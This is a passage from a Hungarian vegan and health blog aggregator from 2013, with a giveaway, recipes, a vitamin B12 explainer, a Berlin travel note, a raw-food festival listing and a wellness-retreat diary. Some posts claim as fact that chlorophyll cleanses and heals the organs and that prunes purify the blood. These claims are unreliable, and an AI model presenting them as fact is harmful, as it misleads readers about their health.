titkunk… (*Utolsó, karácsony előtt garantáltan kiszállításra kerülő rendelés leadási határideje: 2013. december 20.) Ráadás meglepetésünk egy értékes nyeremény: A www.dejavuvilag.hu webáruházban 2013. december 1-20-ig, legalább 10.000 Ft értékben rendelők között kisorsolunk egy 10.000 Ft értékű elektromos illóolaj párologtatót (aroma diffúzort). A Deja-Vu Világ elérhető az alábbi linkeken: - weboldal - blog - Facebook oldal ***** NYEREMÉNYJÁTÉK! Nyeremény : két nyertes egy-egy csomag díszdobozba csomagolt szappant fog kapni (a nyertesek választhatják ki, hogy melyik két fajtát szeretnék a csomagban). Menjetek fel a Deja-Vu oldalára, nézzetek szét náluk és írjátok meg ide kommentben, hogy melyik két szappan tetszik nektek a legjobban (az én kedvencem a répatorta szappan, Ádikáé meg a vidám manó szappan )! Feltétlen írjátok meg az email címeteket is, hogy értesíteni tudjam a nyerteseket! Extra pontokért lehet lájkolni a Deja-Vu Világ és Zizi kalandjai Facebook oldalakat (ha már megtettétek akkor is írjátok be a neveteket ebbe a kis formulába)! Először tesztelem ezt a nyereményjáték formulát, remélem a kevés angol nyelvű szöveg azért mindenki számára érthető – ha nem, jelezzétek – és ki tudjátok tölteni! a Rafflecopter giveaway Szabályok : 2013. december 5-ig lehet játszani. Eredményhirdetés 2013. december 6-án (micsoda Mikulás ajándék lesz a nyerteseknek!). Két nyertest sorsolok ki, akiket emailben értesítek, majd a nevük kikerül a blogra (ez a bejegyzés fog frissülni) és a Zizi kalandjai Facebook oldalára is. A nyertesek a nyereményüket a Deja-Vu világtól fogják megkapni (a cég magyarországi címre postázza a nyereményt).
Zöldell a szendvicskrém
Nagyon "véres" szendvicskrémet készítettem minap. Véres és mégis zöld. S ha az összetevőket megnézitek, akkor biztos kételkedni fogtok szavaimban. "Ugyan, hát ebben hol a vér?!" - akadhattok ki. Na jó, oké, belátom, ez a szendvicskrém igen elvontan sikeredett véresre . Mivel két zöld növény, konkrétan a spenót és a petrezselyem, alapjaival készült, így meglehetősen gazdag klorofillban. A klorofill pedig nem más, mint a növények "vére". Persze, átvitt értelemben, mivel a klorofill kémiai szerkezete és molekula felépítése erősen hasonló a vér hemoglobinjáéval. Ahogy a vérünk át és átjárja testünk minden apró részletét, úgy a klorofill képes valamennyi szervünket, az egész belső rendszerünket (ki)takarítani, ezzel együtt pedig akár gyógyítani is. Ezért is fontos, hogy minél több zöld színű levél-félét fogyasszunk. Ennek egyik módja az alábbi szendvicskrém, amelyhez remekül passzol a finom paradicsom. (Még be lehet szerezni piacokon magyar paradicsomot, de ezt a receptet bármikor máskor is elkészíthetjük, paradicsom helyett téli időszakban megízesíthetjük retekkel, csírákkal, póréhagymával, stb.) A recept: Hozzávalók: 10 dkg friss spenót 1 nagy csomó petrezselyemlevél 1 bögre napraforgó 1 dl víz só 1-2 gerezd fokhagyma aprítógép sörélesztő-pehely (elhagyható) olaj (opcionális) erős aprítógép Elkészítés: A napraforgó szemeket teflonedényben enyhén barnára pirítjuk, majd az aprítógépünkben jó apróra, szinte porhanyósra daráljuk. A spenót és a petrezselyem hosszú szárait levágjuk, majd a megmosott spenótleveleket kicsit felszeleteljük (jobban fogja vinni a gép). A megdarált napraforgóhoz hozzáadjuk a spenótleveleket és a petrezselymet, öntünk bele egy kevés vizet és egyszerűen az aprítógépben néhány gerezd fokhagymával, sóval és egy kevés vízzel krémesre összeturmixoljuk. Ha túl sűrű lesz a pástétom, egy kevés vízzel vagy esetleg némi hidegen sajtolt olajjal még lazíthatunk rajta. A turmixolás során is egyre sűrűsödik, így minden bizonnyal kell némi vizet közben (is) hozzáadni. Ezzel kész is a pástétom. Ha úgy tartja ízlésünk, egy kevés sörélesztő-pehellyel összekeverve még finomabb, krémesebb pástétomot kapunk.
GfK: közel minden harmadik vásárlói kosárba kerül friss zöldség vagy gyümölcs
Közel minden harmadik vásárlói kosárba kerül friss zöldség vagy gyümölcs, friss áru vásárlásakor pedig fontos a fogyasztóknak, hogy magyar eredetű terméket vásároljanak – derül ki a GfK Hungária legfrissebb felméréséből, amelynek eredményeit kedden juttatta el az MTI-nek. A GfK Hungária adatai szerint a zöldség és a gyümölcs a legnépszerűbb élelmiszerkategóriák közé tartozik Magyarországon: az őszi ...
Fűszeres, mandulás linzer
2013. november 7. Fittanyuka Blog
Hamarosan érkeznek az ünnepek és előtérbe kerülnek a sütemények. Nem kérdés, hogy ha az ünnepek alatt odafigyelünk, hogy nemcsak finom, de egészséges ételek kerüljenek az ünnepi asztalra, akkor a sütemények is egészségesek. Semmi fehér cukor, fehér, finomított búza liszt, adalékok, mesterséges vanilin, hidrogenizált zsírok stb. Az elmúlt hetekben az Oriflame Magyarország felkért egy nagyon megtisztelő címre: legyek a cég Wellness Háziasszonya és kreáljak olyan finom és egészséges recepteket amelyekben használom valamelyik welness terméküket. Azért tettem le a voksomat az oriflame wellness termékei mellett, mert nagyon tiszta, svéd receptúra alapján készül minden termékük, legtöbb termékük megkapta a vegán emblémát és semmi adalék, mesterséges anyag nincs a termékeikben. Ezen kívűl segítenek ebben a rohanó világban megőrizni vagy éppen helyreállítani az egészségünket természetesen. Az én választásom az új növényi ital porra esett, amely fantasztikus gyógynövény és legfőképpen egy gyógyhatású fűszerkeverék. A nyugtató Botanic infusion összetevői a következők: kamilla, fahéj, kardamon, rooiboss. Karácsonyi ízek keverednek a fahéj és kardamon miatt. Nagyon finom és kellemes lett az összhatás, javaslom készítsétek el az ünnepekre! Részletes információ kérés, kedvezményes vásárlási lehetőség a wellness termékekkel kapcsolatosan: fittanyuka@gmail.comFittanyuka
B12 - a vegán életmód Achilles-sarka?
2013. november 4. La Veganista
A nagy B12 vita mindig akkor lángol fel, ha valaki vegán életmódra vált. Sokszor a barátok, jóakarók kezdenek aggódni, máskor a vegán közösségen belül folynak parázs viták arról, ki honnan szerzi a B12-t. Harmadsorban (ez a legszomorúbb), vannak akik a saját bőrükön tapasztalják meg, hogy milyen következményekkel jár a hiánya. Emiatt akár fel is hagynak a vegán életmóddal, pedig csak annyit kellett volna tenniük, hogy odafigyelnek a vitaminpótlásra. Mivel a Vegán Világnapon is feltettek kérdéseket ezzel kapcsolatban, úgy gondoltam egy poszt erejéig érintem a témát. Jó hír egyébként, hogy a Magyar Vegán Társaság már dolgozik egy B12-ről szóló, átfogóbb információs anyagon, amit hamarosan közread. Mi a fene az a B12? Mikroorganizmusok állítják elő, vízben oldódó vitamin, amely nélkülözhetetlen az emberi szervezet számára. Szükségünk van rá többek közt a vörösvértest képzéshez, a fehérjeszintézishez, a nukleinsavak építéséhez, a sejtanyagcseréhez, valamint a központi idegrendszer működéséhez. Két biológiailag aktív formája ismert. A természetes a methylcobalamin és az adenosylcobalamin, a szintetikusan előállított a cyanocobalamin. Miért alakul ki B12 hiány? Vegánok esetében főként azért, mert a növényi étrend bármennyire is vitamindús, a szervezet számára szükséges mennyiségben a vitamin aktív formáját nem tartalmazza. Csak vegánoknál alakulhat ki B12 hiány? Egyáltalán nem. Számos betegség jár felszívódási problémával, vagy a felszívódáshoz szükséges intrinsic faktor hiányával. Emiatt a szervezet még akkor sem jut elegendő B12 vitaminhoz, ha valaki mindenevő: - krónikus, sorvadással járó gyomorgyulladás (a gyomornyálkahártya sejtjeiben termelődik az intrinsic faktor (belső tényező) nevű fehérje, ami lehetővé teszi a B12 vitamin felszívódását a vékonybél csípőbél szakaszán) - gyomor és vagy vékonybél csonkolás - örökletes enzimbetegség - intrinsic faktor veleszületett hiánya - Crohn-betegség - Cöliákia - időskori felszívódási zavarok - vékonybélben elszaporodó baktériumok - parazita fertőzés (bélférgesség) - túlzott alkoholfogyasztás - autoimmun betegségek pl. Basedow-kór, szisztémás lupus erythematosus (bőrfarkas) - savkötő gyógyszerek hosszan tartó alkalmazása Ellenőrizhetem, hogy mennyi B12 van a szervezetemben? Igen, a B12 szintje vérvétellel meghatározható. Ezt célszerű évente egyszer, a rutin vérvételhez kapcsolva elvégeztetni. A felszívódási zavar pedig Schilling-teszttel igazolható. Meddig bírom ki B12 pótlása nélkül? Egyénenként változó. Noha a B12 vízben oldódó vitamin, a máj képes tárolni. Átlagosan kb. 2000-5000 mikrogrammnyi raktározódik belőle. Ez több éven keresztül (egyes források szerint 3-6 év) is biztosítja a B12 ellátást. Akinek ennél kevesebb van raktáron, annál hamarabb jelentkeznek a tünetek. Mik a B12 hiány tünetei? Mivel vérképzési (anémia perniciosa, megaloblasztos anémia) és idegrendszeri problémákat okoz, ezért a tünetek az ezekre jellemző képet mutatják. Sápadtság, fáradékonyság, légszomj, szapora szívverés, megnagyobbodott lép, tükörnyelv, gyomor, bélrendszeri zavarok, végtagzsibbadás, egyensúlyzavar, reflexkiesés, kóros reflexek, izomgyengeség, járási nehézség, látászavar, memóriazavar, ingerlékenység, depresszió, hallucináció, személyiségzavarok, szellemi leépülés. Miben van B12? A szakirodalom jelenlegi álláspontja szerint állati eredetű táplálékból szerezhető meg (máj, hús, hal, tojás, tejtermékek). Mivel ezeket a vegán életmód teljességgel kizárja, más forrásokat kell keresni. Néhány cikk említi, hogy sörélesztőben, algákban, mosatlan organikus eredetű zöldségekben gyümölcsökben előfordul. A sörélesztőben, élesztőkben nincs (ha lenne benne hozzáadott formában, akkor ugyanúgy jeleznék a csomagoláson, mint a vegán Marmite címkéjén.). A sörélesztővel, algákkal, lucerna és búzacsírával kapcsolatos vegán reményeket az táplálja, hogy egyes vizsgálatok kimutattak bennük B12 vitamint, de ez az emberi szervezetszámára nem hasznosítható, úgynevezett inaktív analóg. Egyes oldalak a mosatlan, organikus eredetű gyümölcsöt és zöldséget említik még B12 forrásként, ha nem mossák meg fogyasztás előtt. Véleményem szerint, ha van is rajta biológiailag aktív B12, vannak vegánok, akik nem jutnak organikus módszerrel termelt növényekhez (például nekem sincs lehetőségem napi szinten fogyasztani), ha mégis, esélyes hogy megsikálja evés előtt (bevallom én is megmosom a biozöldségestől, vagy őstermelőtől vett növényeket. Ki tudja, hogy milyen személyi higiéniája volt a gyümölcsszedőknek, és mennyire volt tiszta a láda, amibe pakolták.). Vagyis ez sem mindenki számára elérhető, megbízható forrás. Hogyan jutok hozzá a B12-höz, ha vegán vagyok? A Vegan Society ajánlása szerint B12-vel dúsított élelmiszerek fogyasztásával, vagy táplálékkiegészítők szedésével. Ha valaki csak dúsított élelmiszereket fogyaszt, tudnia kell hogy egy adagban mennyi B12 található. Amennyiben kevesebb, mint a napi ajánlott mennyiség, úgy több adagot kell fogyasztani belőle, vagy más dúsított élelmiszerrel kell kombinálni. Sokan emiatt kényelmesebbnek tartják a táplálékkiegészítők szedését, melyek vitamintartalma koncentráltabb. Túladagolhatom a B12-t? Túladagolást, illetve mellékhatást, a hazai források nem írnak le. Bizonyos mennyiségű B12-t a máj képes tárolni, a felesleg pedig a vizelettel kiürül. Ennek ellenére nem ajánlják a túlfogyasztását, mert a lappangó daganatos folyamatokat felgyorsíthatja. Fogyasztok B12-t, mégis hiánytüneteket észlelek magamon. Mi az oka? - Túl sokat vártam a pótlással, ráadásul nem szedek eleget - Rendszertelenül szedem, vagy az ajánlott mennyiségnél kevesebbet szedek így nem jut elég a szervezetembe - Nem az előírásnak megfelelően veszem be a tablettát pl. nem rágom meg - Felszívódási zavarom van Mennyi B12-re van szüksége a szervezetemnek? Az OÉTI ajánlása szerint felnőtteknél a napi ajánlott bevitel 2,5 ?g. Mi a cikk konklúziója? Mindegy, miben hiszel, algában, biogyümölcsben, vagy táplálékkiegészítőben. Ha vegán vagy, (de ha nem, akkor is) évente egyszer érdemes ellenőriztetni a B12 szinted, és ha szükséges, biztos forrásból pótold a vitamint, ezzel elkerülheted a hiánybetegség kialakulását.
Egy vegetáriánus Berlinben
2013. november 1. Vegasztrománia
Pihenni kell. Hiába imádom azt, amit csinálok, időnként időt és teret kell hagynom arra, hogy csak magamra figyeljek, és kiszakítsam magam a megszokottból. Most is ez történt. Régi vágy és ötlet vált valóra, pár napot Berlinben töltöttem. S bár tényleg kikapcsolódni mentem, nem tudtam nem szakmázni. Egész egyszerűen azért, mert Berlin az orrom előtt rebegtette vegetáriánus és vegán pilláit. Nem ezért szerettem bele a városba, de hatalmas piros pont, hogy lépten-nyomon vegetáriánus kínálatokba, vegán helyekbe botlottam. Őrületesen felfrissítő (és sajnos eddig ismeretlen) élmény volt azzal szembesülni, hogy van olyan város, ahol nem magyarázkodnom kell, hogy miért nem kérek túrós csuszát, ha van rajta pörc ("Hiszen az nem hús!"), hanem válogathatok a különböző stílusú és kínálatú húsmentes helyek között. Már másnap felfedeztem a berlini Hunyadi téri piacot (ottani nevén Boxhagener Markt), persze kicsit "vegányabb " változatát. Sarkán a Szimpla Kaffeehause-zal tényleg itthoni érzetet kelt, de ahogy beljebb merészkedünk a szombati gasztro-piacra, a rengeteg saját kertben termesztett bio zöldség és gyümölcs , illetve a zöldségkrém árus, aki kb. 20-féle vegetáriánus kencét árul kisbuszából (egyelőre) gyanússá teszi a dolgot. Persze nem nehéz elképzelni, hogy milyen a vega helyzet ott, ahol külön bolthálózat van a vegánoknak.. A Warschauer Strassén található Veganz magában egyesít egy boltot, ahol mindenféle állati eredettől mentes élelmiszert megvásárolhatunk, egy kávézót, tele vegán szendvicsekkel, nyers sütikkel, valamint egy vegán cipőboltot. Nem kell címkéket bogarásznunk, nem kell külön szólnunk, hogy növényi tejet kérünk a latténkba, ehelyett azt kérdezik, hogy melyikkel kérjük az 5 lehetőség közül. Igen, van gasztro-forradalom Magyarországon, és igen, vegetáriánus szempontból is változott a hozzáállás és kínálat az utóbbi években. De Berlint látva azt érzem, hogy bőven van még hova fejlődni. Elkeseredés helyett inkább elszántságot érzek, új löketet kapott bennem a vega küldetéstudat. Az biztos, hogy megyek még Berlinbe, de nemcsak a vegetáriánus élet vonz vissza. Mindenesetre legközelebb biztosan ellátogatok a Vönerbe vegetáriánus dönerért!
Megnyílt Magyarország legolcsóbb étterme
A chips és a hamburger is lehet egészséges, és fasírtot is csinálhatunk anélkül, hogy a végén le kelljen itatni róla a tocsogó olajat. Lehet élni hús, sajt, túró, cukor, tojás és liszt nélkül? Budapest legújabb éttermében azt mondják: igen. Elég, ha gyümölcsökben, zöldségekben és magvakban gondolkodunk. Mindezt kizárólag nyersen. Közép-Európa egyetlen nyers éttermében, az Élet Éttermében jártunk.
Aszalt szilva és az antioxidánsok
Nagy öröm számomra, hogy a késő nyár, kora ősz ízeit is mindenféle mesterséges adalék nélkül tudom tartósítani. Ennek egyik módja az aszalás. Ugyan idén nyáron már volt egy nagyobb aszalási projekt itthon, amikor körtét, almát meggyet és cseresznyét aszaltunk, de a tavalyi szárított szilva elfogyott, így készen álltam arra, hogy egy újabb menetről gondoskodjam. Annyira jó, hogy télen akár reggeli készítéshez, vagy sütéshez felhasználhatom ezeket a finomságokat. Ha pedig üzletben vagy kereskedésben szeretném megvenni, többszörösen rosszul járnék. Egyrészt, mert szerintem elég drágák tudnak lenni, másrészt ki tudja milyen egészségtelen eljárással készülnek. Ami pedig az aszalt szilva jótékony hatásait illeti, el kell áruljam, hogy rengeteg antioxidánst tartalmaz. Három gyümölcs emelkedik ki az antioxidáns magas tartalma miatt. Az egyik az aszalt szilva, a másik a mazsola, és e kettőt előzi le a mangosztán trópusi gyümölcs (nem manguszta, se nem szurikáta ;) ) De mi is az az antioxidáns? Annyit hallunk felőle, azonban biztos kevesebben tudják azt, hogy pontosan mire hivatott, vagy miért kell(ene) sok antioxidánst fogyasztani?! "Az antioxidáns egy olyan stabil molekula, amelynek szerepe az emberi szervezetre káros szabadgyökök semlegesítése. Legfőbb szerepük az, hogy megszüntessék a szabadgyökök által okozott károsodásokat. Egy oxidációs folyamatot gátló vegyület, amely sejtjeink és testünk rozsdásodását, korai elöregedését hivatott megakadályozni. Bizonyos antioxidáns típusokat (enzimek, koenzimek) az emberi szervezet is elő tud állítani, ám nagy szükség van a táplálék útján bevitt antioxidánsokra is (pl. C-vitamin)." (antioxidans.hu) Szabad gyökök pedig például stresszhelyzetben is kialakulnak. Nem csak az öregedésért, hanem nagyon sok betegség megjelenéséért is felelősek. (Például - wikipedia alapján - : anyagcsere betegségek, ízületi gyulladások, szembetegségek, asztma, parkinson-kór, stb.) Ez a mangosztán. Még nem ettem, de ha valaki tudja, hol lehet Magyarországon hozzájutni, vagy hoz nekem ajándékba a trópusi éghajlatú országokból, szívesen fogadom. :) A Tufts Egyetemen végeztek vizsgálatokat az aszalt szilva antioxidáns tartalmát kutatva. Megállapították, hogy az aszalt szilva kétszer olyan erős antioxidáns, mint a mazsola. Nem csak antioxidáns tartalma miatt tanácsos fogyasztani. Ásványi anyag tartalma vasban, kalciumban, magnéziumban és foszforban is igen gazdag. Vérszegény és vashiányos betegeknek azért ajánlott, mivel magas mértékben történik a vas-felszívódás aszalt szilva fogyasztásakor. Emellett vértisztító, emésztést elősegítő, székelést könnyítő, salaktalanító hatását is megfigyelték. Igazából csak a cukorbetegeknek kell óvatosan bánni az aszalt szilva fogyasztásával, mivel mint a legtöbb aszalvány, ez is magas cukortartalommal bír. Az aszalt szilva ma már otthon is elkészíthető egy asztali aszaló (vagy villanysütő) segítségével. A jól megmosott szilvákat kimagozzuk, kettévágjuk, majd az aszaló rácsos tálcáira tesszük és indulhat az aszalás. 8-12 órán keresztül a meleg levegő remekül kifejti hatását. A megaszalódott gyümölcsöket érdemes ezután még fél napot "szellőztetni", majd elfertőtlenített üvegbe zárva hosszú hónapokig megőrzi jó minőségét. Fogyasszunk aszalt szilvát szinte minden nap- főleg abban az időszakban, amikor nincs lehetőségünk friss gyümölcsöt enni - , és tartsuk magunkat egészségesebben.
Ropogós saláta – Vendég bejegyzés A’la carte kulináriától
2013. szeptember 28. Zizi kalandjai
Emlékszem, Krisztivel először egy Makifood késtechnika órán találkoztam. Az ő blogja, az A’la carte kulinária, akkor már eléggé ismert volt, sokan főztek/sütöttek az ő receptjeiből. Aztán egyre többször találkoztunk, futottunk össze rendezvényeken, majd barátok lettünk. Azóta gyakran járunk együtt gasztronómiával kapcsolatos eseményekre, programokra. A blogja nagyon sokszínű, a húsos ételektől kezdve a vegánig, minden megtalálható rajta, saláták, turmixok, isteni desszertek, ezenkívül könyvajánlókat is ír, valamint az utazásaikról beszámolót. Érdemes böngészgetni az oldalát és a videóit, sok kincsre lehet bukkanni. Egy könnyű, inkább tavaszias saláta receptet oszt meg veletek, amely lehet előétel vagy akár köret is. Ropogós saláta Hozzávalók 3-4 fő részére: - 1 fej jégsaláta - 1 szál répa - 4-5 db retek - 1 db kígyóuborka - 15 db koktélparadicsom - 1 db citrom leve - 4 evőkanál olívaolaj - menta, petrezselyem - fekete szezámmag A jégsalátát megtisztítjuk, megmossuk, feldaraboljuk. A répát meghámozzuk és lereszeljük. A retket felkarikázzuk, az uborkát pedig felkockázzuk. A paradicsomokat félbe vágjuk, a zöld fűszereket pedig felaprítjuk. A citrom levét és az olajat egy kis tálkában összekeverjük. A földimogyorót egy kevés olajon serpenyőben megpirítjuk. Az összes hozzávalót egy nagy tálban összekeverjük, ráöntjük a citromos öntete és jól összeforgatjuk. Önmagában vagy köretként (például sült tofuhoz) tálaljuk fekete szezámmaggal megszórva. ***** Mini interjú, hogy Krisztit jobban megismerhessétek… Mióta írsz blogot? K: A blogot 2009 nyara óta írom. Itthon voltam a kislányommal és minden nap főztem, így jött az ötlet, hogy a sok kipróbált vagy akár kitalált receptet valahol össze kellene gyűjteni. Mikor kezdtél el főzni/sütni? K: Amióta önálló háztartást vezetek rendszeresen főzöm, nagyon sok szakácskönyvem van, de igazán csak 2009-től mélyedtem bele a gasztronómia világába. Kitől tanultad az alapokat? K: Az alapokat természetesen anyukámtól tanultam, vele is sokat sürögtem forogtam a konyhában. Melyik az ikonikus ételed, ami a leginkább téged jellemez? K: Három ételt nevezném itt meg, ezeket mind nagyon szeretem és sok újdonság van bennük: - fügefa levél fagyi – ehhez az ötletet egy arab szakács könyvéből kaptam - eperrel töltött rizsgombóc - epres tejberizs rizspapírban Mi a kedvenc vegetáriánus/vegán ételed? K: Sült kápia paprika jut elsőre eszembe, de nagyon sok van. Honnan szerzel inspirációt az ételek elkészítéséhez? K: Rengeteg szakácskönyvem van, illetve szeretem a magyar és külföldi gasztroblogokat. Utazásaid során mi volt a legemlékezetesebb fogás, amit ettél? És miért? K: Cao lao Vietnámban, ez egy tésztaétel és kizárólag a Hoi An régióban készítik. Nagyon komplex az ízvilága, sok alkotóelemből áll és nagyon különleges. Aszalt szilvás marha tagine Marokkóban, ennek a fogásnak a fűszeres, édes, de sós ízvilága nagyon tetszett nekem Nevezz meg három ételt/alapanyagot, ami mindig van a hűtődben! K: Szójaszósz vagy halszósz, citrom, vaj. Van olyan étel, ami mindig az otthonra/gyerekkorodra emlékeztet? K: Igen, a töltött káposzta, ahogy anyukám készíti, a ludas kása, ahogy mamám készíti és a dédimamámnak volt egy túró rudi süti receptje. Az emberek meglepődnének, ha rájönnének, hogy ez is van a konyhádban… K: Talán a szemöldökcsipesz, ezt használom a halak esetében a szálka kihúzására.
Zöldturmix Fesztivál 2013 október 20
2013. szeptember 11. Nyersétel akadémia
Idén is megrendezésre kerül a Zöldturmix fesztivál, ami Magyarország első nyersétel-központú rendezvénye a Kőrösi Csoma Sándor Kőbányai Kulturális Központban, Bp. X. Szent László tér 7-14. Szeretnénk minél több oldalról bemutatni ezt az életmódot, könyvekkel, előadásokkal, gépekkel, kóstolókkal várjuk a kedves érdeklődőket. Minden egy helyen, ami a nyers étkezésről szól, vagy hozzá kapcsolódik! Igényesen kiválasztott kiállítók, színvonalas előadások! Mindenkit szeretettel várunk a Kőrösiben Kőbányán! Előadások az 1-es terem kis színpadán: Lénárt Gitta (Nyersétel Akadémia, előadás és ételkészítés) ATMA jóga bemutató 15 percben Nagy László Zoltán (a Hippocrates Intézet életmód tanácsadója, a 80/10/10 tapasztalatairól beszél majd) Sütő Mónika (blogger, nyers torta készítés) Bogár Niki (blogger, az új generáció, a “szépség belülről fakad” címmel tart előadást) Hliva Patrick (erőnlét és aktív sport nyers ételekkel) Acoustic Light Blue (Kőrösi Gábor zenekara pop-rock-blues-country feldolgozások) 43-as terem: Sirius masszázs - relaxáló ill. frissítő svédmasszázs, vagy talpmasszázs kedvezményesen, térítés ellenében. Előzetes időpont foglalás a zoldturmixfesztival@gmail.com e-mail címen. A balett teremben az ATMA Center ingyenes jóraórái: 10 -Astanga vinyásza jóga – Gauranga Das 11 – Agni-jóga – Kowalsky 12 – Hátrahajlítás – Szücs Orsi 13 – Kontakt- és Akro-jóga – Pákh Anna 14 – Csípőnyitó jógaóra – Herczeg Angelika 15 – Jógaterápia – Major Ági 16 – Body Art – Lovász Andrea 17- Vinyasa Flow – Herczeg Angelika Kiállítók: Nyersétel Akadémia Életkonyha Napeledel Bioverzum csírák, gépek Friss búzafű Bioenergetic kiadó Bio fodrász, bio kozmetika, bio fogászat tanácsadás és még sokan mások… Nyersétel “főző”verseny nyeremények: Lénárt Gitta könyvei, egy tálca friss búzafű, egy doboz friss csíra, magtej készítéséhez szűrőzsák… és még folyamatosan jönnek a felajánlások… érdemes nevezni! További részletek itt: https://www.facebook.com/ZoldturmixFesztival
Eleki élménybeszámoló 2013 - 1. rész
Ezen a nyáron is részt vettünk egy turnuson az Eleki Életmódközpont szervezésében. Most már azért beszélhetek többesszámban, mert férjem is velem tartott, illetve tavaly nyáron megrendezett turnusról nem csak én voltam a visszatérő, hanem akkori szobatársam, illetve egy harmadik "páciens" is, akit akkor dohányzásleszokásban és pánikbetegségben segítettek. Ezen felül volt szobatársam testvére is eljött, valamint jelen volt betegként az egyik kezelő édesanyja is. Továbbá megismerhettünk ott egy osztrák férfit, aki sajnos daganatos betegség miatt érkezett. Összesen 10 vagy 11 kezelt volt. Kezelő valamivel kevesebb, mivel az én kezelőm, illetve férjem kezelője is két-két beteget gondozott a turnus ideje alatt. Tavalyi kezelőm jutott nekem idén is. Hadd ne mondjam, profi a lány :). Csak "főállás" mellett jár el egy-egy turnusra kezelni, de szerintem ezt kellene inkább csinálnia, mert kevés olyan ember létezik, akinek ösztönösen működik az az érzéke, hogy mire van szüksége a betegnek. Na persze, ehhez hozzájárul az is, hogy van rá figyelme, és időt szakít a kezelendő páciensre. Szóval ismét a legjobbat kaptam. Persze nem mondhatom, hogy kizárólag ő a legjobb. Az ott szolgálatát teljesítő röntgen orvos felesége is kezelő. Megfigyeléseim szerint ő is hasonlóan kimagaslóan jó lehet. Na de igazából nem a kezelőkről szeretnék regélni, hanem megpróbálom most azt a 7 napot rövidebben elmesélni, mint tavaly. Tehát a turnus ugyan vasárnap délután kezdődött, azonban régi jó barátom egy vidéki kis városban végre beadta a derekát és megnősült. Az ő esküvőjére voltunk hivatalosak vasárnapra, így mi csak hétfőn érkeztünk Elekre. Jól is jött így ki, mert az esküvői torta megkóstolását nem szerettem volna kihagyni.... mondjuk Elek után egy héttel. Arról nem beszélve, hogy ez nem hogy nem vegán, de nem is vegetáriánus esküvői vacsora volt. Nyilván ez nem is elvárás, hiszen vegák is alig voltak. (Bár a vőlegény már évtizedek óra az, felesége tudomásom szerint nem.) Persze azért gondoltak ránk, növényevőkre is...:) S hát ami a sütiözönt illeti... ah... szóljanak inkább a képek a szöveg helyet.. Khm...:) Tudom, az édességekből több a kép, mint az eleki élményekből...:) Ez csak az emberi mivoltom...:) A torta finom volt, és másnap, hétfőn már azzal az elhatározással ébredtem valamikor hajnali 4 órakor, hogy igen, akkor most jöhet a böjt. Tegnap megvolt a "búcsútorta", ma pedig akkor marad csak a víz, ásványvíz, esetleg enyhe, citromos víz, hacsak másképp nem rendelkeznek az orvosok Eleken. Korán keltünk, időben indultunk, így egész szép időn belül odaértünk. A délután esedékes orvosi megbeszélésig könnyedén elhelyezkedtünk szobánkban. Azt a szobát kaptuk, amiben tavaly én aludtam. A konzultáció három orvossal zajlott. Horsly, aki Amerikából van itt hazánkban már 2 éve, továbbá egy férfi és egy nő orvos volt. Ezenkívül az amerikai orvos felesége is jelen volt. Valamint természetesen a kezelő. Szóval alapos konzílium volt. Elsőnek az én állapotomat beszéltük át, majd férjemét. Mindketten ott voltunk egymás megbeszélésén. Nem kíváncsiságból elsősorban, hanem, hogy a jövőben mire, hogyan kell figyelnünk egymás életében, stb. Az orvosi tanácskozásokat követően máris kezeléseket kaptunk. Mindketten gőzpakolást. Férjem most részesült először gőzpakolásban, én pedig már nagyon vártam, hogy ismét ilyen jó dologban legyen részem. Este én már nagyon gyenge voltam - mivel egész nap nem ettem. (Férjem ott ebédelt, és elindulás előtt reggelizett is.) Így az esti témára nem mentem be. Helyette egy jót aludtam. Másnap korán ébredtem, mivel előző nap nem ettem, nem volt nagy szükség alvásra sem. 5-kor már éber voltam. S éreztem, hogy nem vagyok éhes! Örültem neki, így elhatároztam, hogy megpróbálom ezt a napot is böjttel kibírni. Ugyan az orvosok azt mondták, nem szükséges, de én örültem, hogy orvosi felügyelet alatt folytathatom le és aránylag jól bírom. Előző nap volt szobatársam említette, hogy ő sem eszik, így gondoltam, szolidaritást vállalok és vele együtt nem eszek. :) Nos még aznap férjemmel elmentünk sétálni (ő nem böjtölt, táplálkozott rendesen!). Emlékeztem tavalyról, hogy a böjtnap vége felé bár gyenge voltam, de egy jó sétát követően a legnagyobb melegben is erőre kaptam. Ezt vártam most is. Nos nem következett be. Már nagyon gyenge voltam, hiszen ez a második "kajamentes" napom volt. (Hangsúlyozom, önként választottam, nem is önsanyargatásból, hanem éreztem, a testemnek ez jól esik.) Hazaérve még épp letusoltam és elaludtam. Másnap reggel már természetesen táplálkoztam. Nagyjából 60 órát töltöttem el úgy, hogy ételt nem vettem magamhoz. Aztán a harmadik nap reggelén már kaptam is a zöld turmixot, majd valami könnyű kis salátát, hogy ne legyen nehéz a gyomromnak. Kértem, hogy se fűszer, se só, se citrom, se olaj ne legyen a salátán. (Éhgyomorra, hosszabb kajamegvonás után jobbnak tartottam, ha natúr ízekben részesülök.)A nagyobb mozgáshoz még mindig gyengécske voltam. Időközben kaptam gyógyteát is - úgy egy litert, amit el kellett kortyolgatnom napközben. Az ebéd is lezajlott, majd ismét gőzpakolást kaptam. Előző napiakhoz képest ez esett a legjobban eddig. S közben elterveztük, hogy az utolsó kezelési napon lázterápiát is kapok. Férjemmel együtt okosodtunk az előadásokon, élveztük a gőzpakolásokat testünkön, majd a mobilizációs masszázsok is jól estek. A szuper még az volt, hogy az osztrák férfivel, az amerikai orvossal és gyermekeivel angolul tudtunk beszélgetni. Jó volt újra használni az "english-t". :) Az osztrák férfival kapcsolatban érdekes dolgot éltem meg. Első alkalommal vegyesen beszéltünk hol német, hol angol, hol magyar mondatokkal. (Valamennyire azért ő is tud magyarul.) Furcsa érzés kerített hatalmába. Ugyanis a nyakán sajnos látszanak a duzzadt részek, meglehetősen könnyű észrevenni. Én ott szembesültem először ezzel a látvánnyal közelről - face to face. Megrettentem, megijedtem, megrémültem. - Keresem a szavakat rá, hogy kifejezzem, mit éreztem amellett, hogy erősen együtt éreztem vele. Kevés olyan emberrel találkoztam életem során, akiknek így látható jelei vannak a betegségeiknek. (Pedig alapjában nem volt sebes, se csúnya, "csak" dagadt a nyakának az egyik oldala.) Ahogy a vér látványától (még a saját sebemen is, ill. korábban vérvételeken is) képes vagyok rosszul lenni, elájuláshoz közeli állapotba kerülni, úgy ez is egy rövid időre rosszullétet keltett bennem. Sajnálom, mondtam neki, és jeleztem, hogy muszáj kimennem, mert itt helyben rosszul leszek (főleg, hogy kaja az első beszélgetésünkkor még nem volt bennem). Szerencsére mindenféle erőltetés és erőlködés nélkül rövid időn belül túltettem ezen magam, és a turnus végén már hármasban, férjem, ő és én mentünk el sétálni, beszélgetni. Megkedveltük őt mindketten. Jó lenne, ha a kezelések és az intenzív életmódváltás visszafordítaná 